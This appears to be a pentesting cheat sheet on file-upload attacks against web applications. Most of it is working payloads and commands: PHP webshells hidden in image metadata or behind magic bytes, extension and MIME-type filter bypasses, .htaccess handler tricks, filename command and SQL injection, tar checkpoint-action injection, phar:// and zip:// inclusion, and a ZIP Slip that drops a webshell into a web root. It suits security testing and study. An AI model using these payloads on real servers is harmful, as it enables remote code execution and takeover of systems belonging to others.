📁 File upload

📚 Resources

• Multiples attacks methods & vectors
• PayloadsAllTheThings
• HackTricks
• PostSwigger
• Exploit Step by Step

💉 Header Injection

# MIME type Spoofing
Content-Type: application/x-php
# Change it to:
Content-Type: image/png

# Upload a PHP file with a modified MIME type
curl -i -F "file=@shell.php;type=image/gif" --cookie "PHPSESSID=XXXXXXXXX" "http://example.com/?action=upload"

# Set large content length
Content-Length: 5000000

🔗 Double Extension

# If the server only filters by extension
Content-Disposition: form-data; name="file"; filename="index.php.png"

To execute a file with a double extension, you can either upload an .htaccess file or rely on a misconfigured server.

# If a file contains a .png extension, the server will execute it as PHP

AddHandler application/x-httpd-php .png # .png extension
AddHandler application/x-httpd-php .png # .test extension, and upload shell.test

Others payloads for double extension :

# Nul Bytes, characters after a null byte are ignored
index.php%00.png
.php\x00.png
file.php%00.png%00.jpg

# CRLF
file.php%0a.png
file.php%0d%0a.png
file.php%0d%0a
file.php\x0d\x0a.png

# Others
file.png.php
file.png.jpg.php
file.png.pHp5
exploit.p.phphp

Tricks

🖼️ Code in Image Files (PNG, JPEG, GIF)

🐘 PHP

$image = imagecreatefromjpeg('image.jpg');
exif_set_tag($image, 'Comment', '<?php system("id"); ?>');
imagejpeg($image, 'image_with_php.jpg');

🛠️ exiv2 - Exiftool

# add exif Description
exiv2 -c'A "<?php system($_GET[0]);?>"!' shell.jpg

exiftool '-Comment<=shell.php' image.jpg
exiftool -Comment='<?php echo "Command:"; if($_GET){system($_GET["cmd"]);} __halt_compiler();' img.jpg

Add File

echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png

echo '<?php system($_REQUEST["cmd"]); ?>' >> image.png
echo image.png shell.php > evil.png

✨ Magic Bytes

Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.

• PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
• JPG: \xff\xd8\xff
• GIF: GIF87a OR GIF8;

Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/gif
GIF89a; <?php system("id") ?>

🔀 Vulnerability Pivoting (SQLi, XSS)

You can also test sqli, XSS, rce, Path Traversal, SVG to XSS.

# XSS Example
exiftool -Comment="<script>alert(1)</script>" image.jpg
exiftool -Author='"><img src=x onerror=alert(document.domain)>' image.jpg

📄 Payloads

# Space char
index .php
index%20.php

# Others
file.php.\
file.php/
file.jsp/././././.
../../../../etc/passwd # path traversal exploit
shell # no extension
\\example.com\shell.png

.js, .jsp, .asp, .bat, .ps1, .sh, .pl, .htaccess

# Extension
.php4
.php5
.php7
.php8
.phar
.phpt
.phps
.phtml
.phtm
.inc
shell.gif^shell.php

# Extension case-insensitive
shell.pHp

🖌️ Bypass Compression & Resizing

Reference: Persistent PHP payloads in PNGs — Synacktiv.

• Read the original article here
• Image formats injection & Bypass imagecreate erasing

Many web applications process uploaded images through compression or resizing (e.g., PHP-GD) to normalize uploads.
These transformations often strip malicious code embedded in images (erasing metadata, comments, chunks outside IDAT), rendering traditional file upload attacks ineffective.

However, attackers can exploit specific PNG chunks that are preserved after these operations (IDAT chunk is usually preserved).

Why this matters

Even if an application does not allow direct PHP uploads, it may still be vulnerable in combination with another vulnerability, such as:

• Local File Inclusion (LFI): an attacker can include an uploaded file via an LFI vulnerability.
• Server-side template injection or unsafe file usage: some systems parse uploaded images or metadata unsafely.

In these cases, payloads hidden in "safe-looking" images (inside preserved chunks) can still be executed, bypassing MIME type checks or re-encoding protections.

⚙️ Techniques

• Scripts generators

1. PLTE chunk technique

• The PLTE chunk stores the color palette for indexed PNG images.
• It is often preserved after compression/resizing.
• Malicious code can be hidden in palette entries and later extracted if the file is included or processed unsafely.

2. IDAT chunk technique

• Embeds a payload directly in the pixel data (IDAT chunk).
• Some resizing functions preserve enough of the chunk to retrieve the hidden data.
• Typically more fragile than PLTE, but still viable in certain processing pipelines.

3. tEXt chunk technique

• Stores textual metadata in PNG files.
• Certain libraries (e.g., thumbnailImage()) retain tEXt chunks even after resizing.
• Payloads can be injected here and retrieved later.

📝 Filename Injection

If the code used the command shell, SQL or others to register images, try to inject the filename

a$(whoami)z.png # arootz.png
a`whoami`z.png
a';select+sleep(10);--z.png

📦 Tar injection

If the code use a script to compress file and use the argument to call filename like

$1

The script are vulnerable. In bash the argument is passed with var like $1, $2 … but if the filename is named by the command tar gz, the commande can be injectable like :

touch -- '--checkpoint=1' # filename 1
touch -- '--checkpoint-action=exec=sh shell.sh' # filename 2

shell.sh # put the command inside, this file is executed when it compressed

🗂️ Archive / File Tricks

📦 PHAR Tricks

PHar is PHP Archive, if you can upload the .phar file, store the php webshell in phar, upload phra and send request like :

http://vuln.site/?file=phar://compress_phar/shell.php

🖼️ Polyglot

JPEG PHar Polyglot

• What is polyglot PHar ?

See this script for exploiting the vulnerability.

JavaScript / JPEG polyglot

• Polyglot PHar to XSS
• Tools - JPEG Polyglot to XSS

📦 ZIP Tricks

ZIP:// to JPG

If only .jpg files are allowed, you can exploit this using the zip:// wrapper to bypass restrictions and execute PHP code.

# Create a malicious PHP file
echo '<?php system($_GET["cmd"]);?>' > shell.php

# Compress it into a ZIP archive and rename it
zip shell.zip shell.php
mv shell.zip shell.jpg

# Exploit LFI with zip://
?page=zip://path/shell.jpg%23shell.php?cmd=ls

# If the script does: include($_GET['page'] . '.php'), avoid using ".php"
?cmd=ls&page=zip://path/shell.jpg%23shell

ZIP Upload (symlink)

# Get ressource via ZIP upload and symlinks
# 'link' is a symlink pointing to index.php, three directories up
ln -s ../../../index.php link # create symlink to index.php
zip --symlinks test.zip link # create ZIP archive containing the symlink

ZIP Slip

# Create a file that extracts outside the target folder
echo "<?php system(\$_GET['cmd']); ?>" > evil.php
zip test.zip evil.php -q
zip test.zip -q -r ../../../var/www/html/evil.php evil.php